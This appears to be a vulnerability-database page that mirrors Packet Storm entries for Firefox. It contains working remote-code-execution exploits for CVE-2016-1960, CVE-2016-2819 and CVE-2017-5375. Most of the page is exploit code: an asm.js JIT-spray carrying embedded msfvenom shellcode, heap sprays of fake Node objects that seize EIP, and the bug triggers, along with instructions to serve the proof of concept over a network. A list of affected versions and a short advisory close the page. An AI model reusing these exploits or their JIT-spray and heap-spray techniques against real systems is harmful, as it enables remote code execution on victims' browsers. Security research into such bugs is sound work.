        val = (val + 0xa85169b5)|0;
        val = (val + 0xa890eb89)|0;
        val = (val + 0xa83cc583)|0;
        val = (val + 0xa8006d8b)|0;
        val = (val + 0xa890dd01)|0;
        val = (val + 0xa878c583)|0;
        val = (val + 0xa8006d8b)|0;
        val = (val + 0xa890dd01)|0;
        val = (val + 0xa820458b)|0;
        val = (val + 0xa890d801)|0;
        val = (val + 0xa890d231)|0;
        val = (val + 0xa890e789)|0;
        val = (val + 0xa8590d6a)|0;
        val = (val + 0xa810348b)|0;
        val = (val + 0xa890de01)|0;
        val = (val + 0xa890a6f3)|0;
        val = (val + 0xa8900de3)|0;
        val = (val + 0xa804c283)|0;
        val = (val + 0xa890dbeb)|0;
        val = (val + 0xa8247d8b)|0;
        val = (val + 0xa890df01)|0;
        val = (val + 0xa890ead1)|0;
        val = (val + 0xa890d701)|0;
        val = (val + 0xa890d231)|0;
        val = (val + 0xa8178b66)|0;
        val = (val + 0xa81c7d8b)|0;
        val = (val + 0xa890df01)|0;
        val = (val + 0xa802e2c1)|0;
        val = (val + 0xa890d701)|0;
        val = (val + 0xa8903f8b)|0;
        val = (val + 0xa890df01)|0;
        val = (val + 0xa890406a)|0;
        val = (val + 0xa890c031)|0;
        val = (val + 0xa85030b4)|0;
        val = (val + 0xa85010b4)|0;
        val = (val + 0xa890006a)|0;
        val = (val + 0xa890d7ff)|0;
        val = (val + 0xa890c931)|0;
        val = (val + 0xa89000b5)|0;
        val = (val + 0xa890c3b1)|0;
        val = (val + 0xa890ebd9)|0;
        val = (val + 0xa82434d9)|0;
        val = (val + 0xa890e689)|0;
        val = (val + 0xa80cc683)|0;
        val = (val + 0xa890368b)|0;
        val = (val + 0xa85fc683)|0;
        val = (val + 0xa890c789)|0;
        val = (val + 0xa81e8b66)|0;
        val = (val + 0xa81f8966)|0;
        val = (val + 0xa802c683)|0;
        val = (val + 0xa802c783)|0;
        val = (val + 0xa8901e8a)|0;
        val = (val + 0xa8901f88)|0;
        val = (val + 0xa803c683)|0;
        val = (val + 0xa801c783)|0;
        val = (val + 0xa803e983)|0;
        val = (val + 0xa89008e3)|0;
        val = (val + 0xa890cceb)|0;
        val = (val + 0xa890e0ff)|0;
        val = (val + 0xa824248d)|0;
        /* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */
        val = (val + 0xa882e8fc)|0;
        val = (val + 0xa8000000)|0;
        val = (val + 0xa8e58960)|0;
        val = (val + 0xa864c031)|0;
        val = (val + 0xa830508b)|0;
        val = (val + 0xa80c528b)|0;
        val = (val + 0xa814528b)|0;
        val = (val + 0xa828728b)|0;
        val = (val + 0xa84ab70f)|0;
        val = (val + 0xa8ff3126)|0;
        val = (val + 0xa8613cac)|0;
        val = (val + 0xa82c027c)|0;
        val = (val + 0xa8cfc120)|0;
        val = (val + 0xa8c7010d)|0;
        val = (val + 0xa852f2e2)|0;
        val = (val + 0xa8528b57)|0;
        val = (val + 0xa84a8b10)|0;
        val = (val + 0xa84c8b3c)|0;
        val = (val + 0xa8e37811)|0;
        val = (val + 0xa8d10148)|0;
        val = (val + 0xa8598b51)|0;
        val = (val + 0xa8d30120)|0;
        val = (val + 0xa818498b)|0;
        val = (val + 0xa8493ae3)|0;
        val = (val + 0xa88b348b)|0;
        val = (val + 0xa831d601)|0;
        val = (val + 0xa8c1acff)|0;
        val = (val + 0xa8010dcf)|0;
        val = (val + 0xa8e038c7)|0;
        val = (val + 0xa803f675)|0;
        val = (val + 0xa83bf87d)|0;
        val = (val + 0xa875247d)|0;
        val = (val + 0xa88b58e4)|0;
        val = (val + 0xa8012458)|0;
        val = (val + 0xa88b66d3)|0;
        val = (val + 0xa88b4b0c)|0;
        val = (val + 0xa8011c58)|0;
        val = (val + 0xa8048bd3)|0;
        val = (val + 0xa8d0018b)|0;
        val = (val + 0xa8244489)|0;
        val = (val + 0xa85b5b24)|0;
        val = (val + 0xa85a5961)|0;
        val = (val + 0xa8e0ff51)|0;
        val = (val + 0xa85a5f5f)|0;
        val = (val + 0xa8eb128b)|0;
        val = (val + 0xa86a5d8d)|0;
        val = (val + 0xa8858d01)|0;
        val = (val + 0xa80000b2)|0;
        val = (val + 0xa8685000)|0;
        val = (val + 0xa86f8b31)|0;
        val = (val + 0xa8d5ff87)|0;
        val = (val + 0xa80efebb)|0;
        val = (val + 0xa868ea32)|0;
        val = (val + 0xa8bd95a6)|0;
        val = (val + 0xa8d5ff9d)|0;
        val = (val + 0xa87c063c)|0;
        val = (val + 0xa8fb800a)|0;
        val = (val + 0xa80575e0)|0;
        val = (val + 0xa81347bb)|0;
        val = (val + 0xa86a6f72)|0;
        val = (val + 0xa8ff5300)|0;
        val = (val + 0xa86d63d5)|0;
        val = (val + 0xa8652e64)|0;
        val = (val + 0xa8006578)|0;
        val = (val + 0xa8909090)|0;
 
        return val|0;
    }
    return payload_code 
}
</script>
 
<script>
function spray_asm_js_modules(){
    sprayed = []
    for (var i=0; i<= 0x1800; i++){
        sprayed[i] = asm_js_module()
    }
}
 
/* heap spray inspired by skylined */
function heap_spray_fake_objects(){
    var heap = []
    var current_address = 0x08000000
    var block_size = 0x1000000
    while(current_address < object_target_address){
        var heap_block = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
 
            /* fake object target = ecx + 0x88 and fake vtable*/
            heap_block[offset/4 + 0x00/4] = object_target_address
            /* self + 4 */
            heap_block[offset/4 + 0x14/4] = object_target_address
            /* the path to EIP */
            heap_block[offset/4 + 0x18/4] = 4
            heap_block[offset/4 + 0xac/4] = 1
            /* fake virtual function --> JIT target */
            heap_block[offset/4 + 0x138/4] = jit_payload_target 
        }
        heap.push(heap_block)
        current_address += block_size
    }
    return heap
}
 
/* address of fake object */
object_target_address = 0x30300000
 
/* address of our jitted shellcode */
jit_payload_target = 0x1c1c0054
 
/* ASM.JS JIT Spray */
spray_asm_js_modules()
 
/* Spray fake objects */
heap = heap_spray_fake_objects()
 
/* -----> */
/* bug trigger ripped from bugzilla report */
var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
worker.postMessage("zero");
var svgns = 'http://www.w3.org/2000/svg';
var heap80 = new Array(0x1000);
var heap100 = new Array(0x4000);
var block80 = new ArrayBuffer(0x80);
var block100 = new ArrayBuffer(0x100);
var sprayBase = undefined;
var arrBase = undefined;
var animateX = undefined;
var containerA = undefined;
var offset = 0x88 // Firefox 50.0.1
 
var exploit = function(){
    var u32 = new Uint32Array(block80)
 
    u32[0x4] = arrBase - offset;
    u32[0xa] = arrBase - offset;
    u32[0x10] = arrBase - offset;
 
    for(i = heap100.length/2; i < heap100.length; i++)
    {
      heap100[i] = block100.slice(0)
    }
 
    for(i = 0; i < heap80.length/2; i++)
    {
      heap80[i] = block80.slice(0)
    }
 
    animateX.setAttribute('begin', '59s')
    animateX.setAttribute('begin', '58s')
 
    for(i = heap80.length/2; i < heap80.length; i++)
    {
      heap80[i] = block80.slice(0)
    }
 
    for(i = heap100.length/2; i < heap100.length; i++)
    {
      heap100[i] = block100.slice(0)
    }
 
    animateX.setAttribute('begin', '10s')
    animateX.setAttribute('begin', '9s')
    containerA.pauseAnimations();
}
 
worker.onmessage = function(e) {arrBase=object_target_address; exploit()}
//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}
 
var trigger = function(){
    containerA = document.createElementNS(svgns, 'svg')
    var containerB = document.createElementNS(svgns, 'svg');
    animateX = document.createElementNS(svgns, 'animate')
    var animateA = document.createElementNS(svgns, 'animate')
    var animateB = document.createElementNS(svgns, 'animate')
    var animateC = document.createElementNS(svgns, 'animate')
    var idA = "ia";
    var idC = "ic";
    animateA.setAttribute('id', idA);
    animateA.setAttribute('end', '50s');
    animateB.setAttribute('begin', '60s');
    animateB.setAttribute('end', idC + '.end');
    animateC.setAttribute('id', idC);
    animateC.setAttribute('end', idA + '.end');
    containerA.appendChild(animateX)
    containerA.appendChild(animateA)
    containerA.appendChild(animateB)
    containerB.appendChild(animateC)
    document.body.appendChild(containerA);
    document.body.appendChild(containerB);
}
 
window.onload = trigger;
setInterval("window.location.reload()", 3000)
/* <----- */
 
</script>

    

- 漏洞信息 (F146819)

Firefox 44.0.2 ASM.JS JIT-Spray Remote Code Execution (PacketStormID:F146819)
2018-03-16 00:00:00
Rh0  
exploit,remote,code execution
CVE-2016-1960,CVE-2017-5375
[点击下载]

Firefox version 44.0.2 ASM.JS JIT-Spray remote code execution exploit.

<!DOCTYPE HTML>
 
<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 44.0.2 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 44.0.2 32-bit
    2) A successfull exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 
    Notes:
    *) very similar to CVE-2016-2819, but still different:
    *) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1
       because in 46.0.1 it is already fixed.
    *) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it
       was fixed in Firefox > 46.0.1
 
-->
 
<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
 
var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}
 
Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x20200000 
 
    /* target address of asm.js float pool payload*/
    var target_eip = 0x3c3c1dc8
 
    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)
 
    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1800)
 
    /* go! */
    this.trigger_vuln(node_target_addr)
};
 
 
Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = '<table><svg><div id="AAAA">'
    this.heap.gc()
    var a = new Array() 
    for (var i=0; i < 0x11000; i++){
        /* array element (Node object ptr) control with integer underflow */
        a[i] = new Uint32Array(0x100/4)
        for (var j=0; j<0x100/4; j++)
            a[i][j] = node_ptr 
    }
 
    /* original crashing testcase
    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
    */
 
    /* easier to exploit codepath */
    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
 
    window.location.reload()
};
 
 
var Asmjs = function(){};
 
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
    "use asm"
    var foo = ffi.foo
    function payload(){
        var val = 0.0
        /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
        val = +foo(
            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
            -1.587865768352248e-263,
            -8.692422460804815e-255,
            7.529882109376901e-114,
            2.0120602207293977e-16,
            3.7204662687249914e-242,
            4.351158092040946e+89,
            2.284741716118451e+270,
            7.620699014501263e-153,
            5.996021286047645e+44,
            -5.981935902612295e-92,
            6.23540918304361e+259,
            1.9227873281657598e+256,
            2.0672493951546363e+187,
            -6.971032919585734e+91,
            5.651413300798281e-134,
            -1.9040061366251406e+305,
            -1.2687640718807038e-241,
            9.697849844423e-310,
            -2.0571400761625145e+306,
            -1.1777948610587587e-123,
            2.708909852013898e+289,
            3.591750823735296e+37,
            -1.7960516725035723e+106,
            6.326776523166028e+180
        )
        return +val;
    }
    return payload
};
 
Asmjs.prototype.spray_float_payload = function(regions){
    this.modules = new Array(regions).fill(null).map(
        region => this.asm_js_module(window, {foo: () => 0})
    )
};
 
var Heap = function(target_addr, eip){
    this.node_heap = []
};
 
 
Heap.prototype.spray = function(node_target_addr, target_eip){
    var junk = 0x13371337
    var current_address = 0x08000000
    var block_size = 0x1000000
    while(current_address < node_target_addr){
        var fake_objects = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
            /* target Node object needed to control EIP  */
            fake_objects[offset/4 + 0x00/4] = 0x29 
            fake_objects[offset/4 + 0x0c/4] = 3
            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
            fake_objects[offset/4 + 0x18/4] = 1
            fake_objects[offset/4 + 0x1c/4] = junk
            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
            fake_objects[offset/4 + 0x2c/4] = target_eip 
        }
        this.node_heap.push(fake_objects)
        current_address += block_size
    }
};
 
Heap.prototype.gc = function(){
    for (var i=0; i<=10; i++)
        var x = new ArrayBuffer(0x1000000)
};
 
</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />

    

- 漏洞信息 (F146818)

Firefox 46.0.1 ASM.JS JIT-Spray Remote Code Execution (PacketStormID:F146818)
2018-03-16 00:00:00
Rh0  
exploit,remote,code execution
CVE-2016-2819,CVE-2017-5375
[点击下载]

Firefox version 46.0.1 ASM.JS JIT-Spray remote code execution exploit.

<!DOCTYPE HTML>
 
<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successfull exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 
-->
 
<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
 
var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}
 
Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x5a500000 
 
    /* target address of asm.js float pool payload*/
    var target_eip = 0x20200b58
 
    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1000)
 
    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)
 
    /* go! */
    this.trigger_vuln(node_target_addr)
};
 
 
Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = '<table><svg><div id="BBBB">'
    this.heap.gc()
    var a = new Array() 
    for (var i=0; i < 0x10100; i++){
        /* array element (Node object ptr) control with integer underflow */
        a[i] = new Uint32Array(0x100/4)
        for (var j=0; j<0x100/4; j++)
            a[i][j] = node_ptr 
    }
 
    /* original crashing testcase
    document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'
    */
 
    /* easier to exploit codepath */
    document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'
 
    window.location.reload()
};
 
 
var Asmjs = function(){};
 
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
    "use asm"
    var foo = ffi.foo
    function payload(){
        var val = 0.0
        /* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/
        val = +foo(
            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
            -1.587865768352248e-263,
            -8.692422460804815e-255,
            7.529882109376901e-114,
            2.0120602207293977e-16,
            3.7204662687249914e-242,
            4.351158092040946e+89,
            2.284741716118451e+270,
            7.620699014501263e-153,
            5.996021286047645e+44,
            -5.981935902612295e-92,
            6.23540918304361e+259,
            1.9227873281657598e+256,
            2.0672493951546363e+187,
            -6.971032919585734e+91,
            5.651413300798281e-134,
            -1.9040061366251406e+305,
            -1.2687640718807038e-241,
            9.697849844423e-310,
            -2.0571400761625145e+306,
            -1.1777948610587587e-123,
            2.708909852013898e+289,
            3.591750823735296e+37,
            -1.7960516725035723e+106,
            6.326776523166028e+180
        )
        return +val;
    }
    return payload
};
 
Asmjs.prototype.spray_float_payload = function(regions){
    this.modules = new Array(regions).fill(null).map(
        region => this.asm_js_module(window, {foo: () => 0})
    )
};
 
var Heap = function(target_addr, eip){
    this.node_heap = []
};
 
 
Heap.prototype.spray = function(node_target_addr, target_eip){
    var junk = 0x13371337
    var current_address = 0x20000000
    var block_size = 0x1000000
    while(current_address < node_target_addr){
        var fake_objects = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
            /* target Node object needed to control EIP  */
            fake_objects[offset/4 + 0x00/4] = 0x29 
            fake_objects[offset/4 + 0x0c/4] = 3
            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
            fake_objects[offset/4 + 0x18/4] = 1
            fake_objects[offset/4 + 0x1c/4] = junk
            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
            fake_objects[offset/4 + 0x2c/4] = target_eip 
        }
        this.node_heap.push(fake_objects)
        current_address += block_size
    }
};
 
Heap.prototype.gc = function(){
    for (var i=0; i<=10; i++)
        var x = new ArrayBuffer(0x1000000)
};
 
</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />

    

- 漏洞信息

Mozilla Firefox CVE-2017-5375 ASLR and DEP Security Bypass Vulnerability
Design Error 95757
Yes No
2017-01-24 12:00:00 2017-01-24 12:00:00
Rh0

- 受影响的程序版本

Mozilla Firefox ESR 45.5.1
Mozilla Firefox ESR 38.6.1
Mozilla Firefox ESR 38.5.2
Mozilla Firefox ESR 38.5.1
Mozilla Firefox ESR 38.1.1
Mozilla Firefox ESR 31.5.3
Mozilla Firefox ESR 24.1
Mozilla Firefox ESR 24.0.1
Mozilla Firefox ESR 17.0.10
Mozilla Firefox ESR 17.0.9
Mozilla Firefox ESR 17.0.7
Mozilla Firefox ESR 17.0.6
Mozilla Firefox ESR 17.0.5
Mozilla Firefox ESR 17.0.4
Mozilla Firefox ESR 17.0.3
Mozilla Firefox ESR 17.0.2
Mozilla Firefox ESR 17.0.1
Mozilla Firefox ESR 10.0.12
Mozilla Firefox ESR 10.0.10
Mozilla Firefox ESR 10.0.8
Mozilla Firefox ESR 10.0.7
Mozilla Firefox ESR 10.0.5
Mozilla Firefox ESR 10.0.4
Mozilla Firefox ESR 10.0.3
Mozilla Firefox ESR 45.6
Mozilla Firefox ESR 45.5
Mozilla Firefox ESR 45.4
Mozilla Firefox ESR 45.3
Mozilla Firefox ESR 45.2
Mozilla Firefox ESR 45.1
Mozilla Firefox ESR 38.8
Mozilla Firefox ESR 38.7
Mozilla Firefox ESR 38.6
Mozilla Firefox ESR 38.5
Mozilla Firefox ESR 38.4
Mozilla Firefox ESR 38.3
Mozilla Firefox ESR 38.2.1
Mozilla Firefox ESR 38.2
Mozilla Firefox ESR 38.1
Mozilla Firefox ESR 31.8
Mozilla Firefox ESR 31.7
Mozilla Firefox ESR 31.6
Mozilla Firefox ESR 31.5.2
Mozilla Firefox ESR 31.5
Mozilla Firefox ESR 31.4
Mozilla Firefox ESR 31.3.0
Mozilla Firefox ESR 31.3
Mozilla Firefox ESR 31.2
Mozilla Firefox ESR 31.1.1
Mozilla Firefox ESR 31.1.0
Mozilla Firefox ESR 31.1
Mozilla Firefox ESR 31.0
Mozilla Firefox ESR 24.8.1
Mozilla Firefox ESR 24.8
Mozilla Firefox ESR 24.7
Mozilla Firefox ESR 24.6
Mozilla Firefox ESR 24.5
Mozilla Firefox ESR 24.4
Mozilla Firefox ESR 24.3
Mozilla Firefox ESR 24.2
Mozilla Firefox ESR 24.1.1
Mozilla Firefox ESR 24.1
Mozilla Firefox ESR 24.0.2
Mozilla Firefox ESR 24.0
Mozilla Firefox ESR 17.0.8
Mozilla Firefox ESR 17.0.11
Mozilla Firefox ESR 17.0
Mozilla Firefox ESR 10.0.9
Mozilla Firefox ESR 10.0.6
Mozilla Firefox ESR 10.0.2
Mozilla Firefox ESR 10.0.11
Mozilla Firefox ESR 10.0.1
Mozilla Firefox ESR 10.0
Mozilla Firefox 50.0.2
Mozilla Firefox 50.0.1
Mozilla Firefox 43.0.2
Mozilla Firefox 43.0.1
Mozilla Firefox 41.0.2
Mozilla Firefox 39.0.3
Mozilla Firefox 37.0.2
Mozilla Firefox 37.0.1
Mozilla Firefox 36.0.4
Mozilla Firefox 31.8
Mozilla Firefox 29.0.1
Mozilla Firefox 28.0.1
Mozilla Firefox 27.0.1
Mozilla Firefox 25.0.1
Mozilla Firefox 24.1.1
Mozilla Firefox 22.0 4917
Mozilla Firefox 19.0.2
Mozilla Firefox 19.0.1
Mozilla Firefox 17.0.10
Mozilla Firefox 17.0.7
Mozilla Firefox 17.0.6
Mozilla Firefox 17.0.5
Mozilla Firefox 17.0.4
Mozilla Firefox 17.0.3
Mozilla Firefox 17.0.2
Mozilla Firefox 16.0.2
Mozilla Firefox 16.0.1
Mozilla Firefox 15.0.1
Mozilla Firefox 13.0.1
Mozilla Firefox 10.0.12
Mozilla Firefox 9.0.1
Mozilla Firefox 3.6.28
Mozilla Firefox 3.6.22
Mozilla Firefox 3.6.13
Mozilla Firefox 3.6.10
Mozilla Firefox 3.6.9
Mozilla Firefox 3.6.8
Mozilla Firefox 3.6.6
Mozilla Firefox 3.6.4
Mozilla Firefox 3.6.3
Mozilla Firefox 3.6.2
Mozilla Firefox 3.6.1
Mozilla Firefox 3.5.16
Mozilla Firefox 3.5.14
Mozilla Firefox 3.5.13
Mozilla Firefox 3.5.10
Mozilla Firefox 3.5.9
Mozilla Firefox 3.5.8
Mozilla Firefox 3.5.7
Mozilla Firefox 3.5.6
Mozilla Firefox 3.5.5
Mozilla Firefox 3.5.4
Mozilla Firefox 3.5.3
Mozilla Firefox 3.5.2
Mozilla Firefox 3.5.1
Mozilla Firefox 3.5
Mozilla Firefox 3.0.18
Mozilla Firefox 3.0.17
Mozilla Firefox 3.0.16
Mozilla Firefox 3.0.15
Mozilla Firefox 3.0.14
Mozilla Firefox 3.0.13
Mozilla Firefox 3.0.12
Mozilla Firefox 3.0.11
Mozilla Firefox 3.0.10
Mozilla Firefox 3.0.9
Mozilla Firefox 3.0.8
Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 2.0 20
Mozilla Firefox 2.0 .9
Mozilla Firefox 2.0 .8
Mozilla Firefox 2.0 .7
Mozilla Firefox 2.0 .6
Mozilla Firefox 2.0 .5
Mozilla Firefox 2.0 .4
Mozilla Firefox 2.0 .3
Mozilla Firefox 2.0 .19
Mozilla Firefox 2.0 .17
Mozilla Firefox 2.0 .16
Mozilla Firefox 2.0 .10
Mozilla Firefox 2.0 .1
Mozilla Firefox 1.5.8
Mozilla Firefox 1.5.7
Mozilla Firefox 1.5.6
Mozilla Firefox 1.5.5
Mozilla Firefox 1.5.4
Mozilla Firefox 1.5.2
Mozilla Firefox 1.5.1
Mozilla Firefox 1.5 12
Mozilla Firefox 1.5 .8
Mozilla Firefox 1.5
Mozilla Firefox 1.0.8
Mozilla Firefox 1.0.7
Mozilla Firefox 1.0.6
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.4
Mozilla Firefox 1.0.3
Mozilla Firefox 1.0.2
Mozilla Firefox 1.0.1
Mozilla Firefox 1.0
Mozilla Firefox 0.10.1
Mozilla Firefox 0.10
Mozilla Firefox 0.9.3
Mozilla Firefox 0.9.2
Mozilla Firefox 0.9.1
Mozilla Firefox 0.9
Mozilla Firefox 0.8
Mozilla Firefox 0.6.1
Mozilla Firefox 0.0.13
Mozilla Firefox 9.0
Mozilla Firefox 8.0.1
Mozilla Firefox 8.0
Mozilla Firefox 7.0.1
Mozilla Firefox 7.0
Mozilla Firefox 7
Mozilla Firefox 6.0.2
Mozilla Firefox 6.0.1
Mozilla Firefox 6.0
Mozilla Firefox 6
Mozilla Firefox 50.1
Mozilla Firefox 50
Mozilla Firefox 5.0.1
Mozilla Firefox 5.0
Mozilla Firefox 49.0.2
Mozilla Firefox 49.0.1
Mozilla Firefox 49
Mozilla Firefox 48
Mozilla Firefox 47
Mozilla Firefox 46.0.1
Mozilla Firefox 46
Mozilla Firefox 45.0.2
Mozilla Firefox 45
Mozilla Firefox 44.0.2
Mozilla Firefox 44
Mozilla Firefox 43
Mozilla Firefox 42
Mozilla Firefox 41
Mozilla Firefox 40.0.3
Mozilla Firefox 40
Mozilla Firefox 4.0.1
Mozilla Firefox 4.0
Mozilla Firefox 39
Mozilla Firefox 38
Mozilla Firefox 37
Mozilla Firefox 36.0.3
Mozilla Firefox 36
Mozilla Firefox 35.0.1
Mozilla Firefox 35
Mozilla Firefox 34.0.5
Mozilla Firefox 34
Mozilla Firefox 33.0
Mozilla Firefox 33
Mozilla Firefox 32.0.3
Mozilla Firefox 32.0
Mozilla Firefox 32
Mozilla Firefox 31.8
Mozilla Firefox 31.6
Mozilla Firefox 31.1.0
Mozilla Firefox 31.1
Mozilla Firefox 31.0
Mozilla Firefox 31
Mozilla Firefox 30.0
Mozilla Firefox 30
Mozilla Firefox 3.6.7
Mozilla Firefox 3.6.27
Mozilla Firefox 3.6.26
Mozilla Firefox 3.6.25
Mozilla Firefox 3.6.24
Mozilla Firefox 3.6.23
Mozilla Firefox 3.6.21
Mozilla Firefox 3.6.20
Mozilla Firefox 3.6.19
Mozilla Firefox 3.6.18
Mozilla Firefox 3.6.17
Mozilla Firefox 3.6.16
Mozilla Firefox 3.6.15
Mozilla Firefox 3.6.14
Mozilla Firefox 3.6.12
Mozilla Firefox 3.6.11
Mozilla Firefox 3.6
Mozilla Firefox 3.5.19
Mozilla Firefox 3.5.18
Mozilla Firefox 3.5.17
Mozilla Firefox 3.5.15
Mozilla Firefox 3.5.12
Mozilla Firefox 3.5.11
Mozilla Firefox 3.1
Mozilla Firefox 3.0.19
Mozilla Firefox 3.0
Mozilla Firefox 29.0
Mozilla Firefox 29
Mozilla Firefox 28.0
Mozilla Firefox 28
Mozilla Firefox 27.0
Mozilla Firefox 27
Mozilla Firefox 26.0
Mozilla Firefox 26
Mozilla Firefox 25.0
Mozilla Firefox 24.1
Mozilla Firefox 24.0
Mozilla Firefox 23.0.1
Mozilla Firefox 23.0
Mozilla Firefox 22.0
Mozilla Firefox 21.0
Mozilla Firefox 20.0.1
Mozilla Firefox 20.0
Mozilla Firefox 2.0.0.21
Mozilla Firefox 2.0.0.2
Mozilla Firefox 2.0.0.19
Mozilla Firefox 2.0.0.18
Mozilla Firefox 2.0.0.15
Mozilla Firefox 2.0.0.14
Mozilla Firefox 2.0.0.13
Mozilla Firefox 2.0.0.12
Mozilla Firefox 2.0.0.11
Mozilla Firefox 2.0 RC3
Mozilla Firefox 2.0 RC2
Mozilla Firefox 2.0 Beta1
Mozilla Firefox 2.0 beta 1
Mozilla Firefox 2.0 8
Mozilla Firefox 2.0 .9
Mozilla Firefox 2.0 .7
Mozilla Firefox 2.0 .6
Mozilla Firefox 2.0 .5
Mozilla Firefox 2.0 .4
Mozilla Firefox 2.0 .10
Mozilla Firefox 2.0 .1
Mozilla Firefox 2.0
Mozilla Firefox 19.0
Mozilla Firefox 18.0.2
Mozilla Firefox 18.0.1
Mozilla Firefox 18.0
Mozilla Firefox 17.0.9
Mozilla Firefox 17.0.8
Mozilla Firefox 17.0.11
Mozilla Firefox 17.0.1
Mozilla Firefox 17.0
Mozilla Firefox 16.0
Mozilla Firefox 16
Mozilla Firefox 15.0
Mozilla Firefox 15
Mozilla Firefox 14.01
Mozilla Firefox 14.0.1
Mozilla Firefox 14.0
Mozilla Firefox 14
Mozilla Firefox 13.0
Mozilla Firefox 12.0 Beta6
Mozilla Firefox 12.0
Mozilla Firefox 11.0
Mozilla Firefox 10.0.9
Mozilla Firefox 10.0.8
Mozilla Firefox 10.0.7
Mozilla Firefox 10.0.6
Mozilla Firefox 10.0.5
Mozilla Firefox 10.0.4
Mozilla Firefox 10.0.3
Mozilla Firefox 10.0.2
Mozilla Firefox 10.0.11
Mozilla Firefox 10.0.10
Mozilla Firefox 10.0.1
Mozilla Firefox 10.0
Mozilla Firefox 10
Mozilla Firefox 1.8
Mozilla Firefox 1.5.3
Mozilla Firefox 1.5.0.9
Mozilla Firefox 1.5.0.7
Mozilla Firefox 1.5.0.6
Mozilla Firefox 1.5.0.5
Mozilla Firefox 1.5.0.4
Mozilla Firefox 1.5.0.3
Mozilla Firefox 1.5.0.2
Mozilla Firefox 1.5.0.11
Mozilla Firefox 1.5.0.10
Mozilla Firefox 1.5.0.1
Mozilla Firefox 1.4.1
Mozilla Firefox 0.7
Mozilla Firefox 0.6
Mozilla Firefox 0.5
Mozilla Firefox 0.3
Mozilla Firefox 0.2
Mozilla Firefox 0.1
,Mozilla Firefox ESR 45.7
Mozilla Firefox 51

- 不受影响的程序版本

Mozilla Firefox ESR 45.7
Mozilla Firefox 51

- 漏洞讨论

Mozilla Firefox is prone to a security-bypass vulnerability.

